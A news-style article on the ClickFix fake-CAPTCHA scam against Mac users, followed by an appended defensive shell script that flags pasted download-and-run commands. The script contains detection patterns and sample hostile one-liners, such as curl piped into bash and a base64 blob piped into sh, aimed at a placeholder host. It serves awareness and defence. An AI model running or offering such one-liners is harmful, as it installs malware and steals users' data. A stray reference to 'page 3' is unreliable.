Fake CAPTCHA Scam Targets Mac Users With Terminal Malware

Apple MacBook partially open in a dark, minimal setting.

Cybersecurity experts have identified a new scam targeting Mac users through fake CAPTCHA pages. The attack, known as ClickFix, tricks users into believing they must verify their identity. However, instead of solving a simple test, victims are asked to run commands on their own devices.

At first glance, the pages look like normal human verification screens. Yet, they instruct users to open Terminal and paste a command. Once executed, the command installs malware on the system.


How the ClickFix Scam Works

The scam spreads through compromised websites, malicious ads, and phishing campaigns. When users land on these pages, they see what appears to be a standard security check.

Instead of selecting images or ticking a box, the page provides step-by-step instructions. It may even copy harmful commands directly to the user’s clipboard. This increases the chance of accidental execution.

Once the command runs, it downloads malware from a remote server. This malware can steal passwords, browser data, and cryptocurrency wallet details.

Rapid Growth of a Dangerous Technique

Security researchers report that ClickFix attacks have surged dramatically. In fact, detections increased by more than 500% between 2024 and 2025.

Initially, attackers focused on Windows systems. However, they now design versions specifically for macOS. Some malicious pages even detect the user’s device and adjust instructions accordingly.

As shown on page 3 of the document, fake CAPTCHA pages guide users with clear steps, making the scam look convincing.

Why Traditional Defenses Fall Short

Unlike typical malware, ClickFix relies on user action rather than software flaws. This makes it harder for security tools to detect.

Because users run the command themselves, the system treats the action as legitimate. Attackers also use built-in tools like Terminal, a method known as “living off the land.”

As a result, many traditional defenses fail to block the attack.

How to Stay Safe

Experts stress that real CAPTCHA systems never ask users to open Terminal or run commands. Any such request is a clear warning sign.

Users should close suspicious pages immediately and avoid interacting with unexpected prompts. Keeping software updated also helps reduce risk.
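The warning sign above can also be checked mechanically. The following is an added example, not code from the article or the researchers it cites: a POSIX shell check that flags text shaped like a download-and-run one-liner before it is pasted into Terminal. The patterns, function names and sample commands are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: heuristics for text about to be pasted into Terminal.
# The patterns are assumptions about common download-and-run one-liners;
# none of them comes from the article.

# Interpreter names that can execute piped or fetched content.
INTERP='(sudo[[:space:]]+)?(sh|bash|zsh|osascript|python3?|perl)([^[:alnum:]_]|$)'

_match() { printf '%s\n' "$1" | grep -Eiq -- "$2"; }

# Print one line per heuristic that the text in $1 matches.
clickfix_reasons() {
    _match "$1" '(curl|wget)[^|]*[|][[:space:]]*'"$INTERP" &&
        echo "remote fetch piped into an interpreter"
    _match "$1" 'base64[[:space:]]+(-d|--decode)[^|]*[|][[:space:]]*'"$INTERP" &&
        echo "decoded blob piped into an interpreter"
    _match "$1" '(eval|(sh|bash|zsh)[[:space:]]+-c)[^#]*[$][(][[:space:]]*(curl|wget)' &&
        echo "remote fetch executed through command substitution"
    _match "$1" '#.*(captcha|not a robot|verif(y|ication))' &&
        echo "verification wording in a trailing comment"
    return 0
}

# Return 1 (and explain on stderr) when the text should not be run.
clickfix_check() {
    reasons=$(clickfix_reasons "$1")
    [ -z "$reasons" ] && return 0
    printf 'do not run: %s\n' "$1" >&2
    printf '%s\n' "$reasons" | sed 's/^/  - /' >&2
    return 1
}

# Constructed samples (example.invalid never resolves). On macOS the
# clipboard itself can be checked with: clickfix_check "$(pbpaste)"
while IFS= read -r sample; do
    if clickfix_check "$sample"; then printf 'no match: %s\n' "$sample"; fi
done <<'EOF'
brew install wget
curl -s https://example.invalid/api | grep status
curl -fsSL https://example.invalid/x | bash
echo "<constructed-blob>" | base64 -d | sh
/bin/bash -c "$(curl -fsSL https://example.invalid/v)" # CAPTCHA verification 4821
EOF
```

A clean result only means none of these few patterns matched; it does not make a pasted command safe to run.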

Ultimately, awareness remains the strongest defense. Since this scam relies on deception, recognizing the signs can prevent serious data loss.
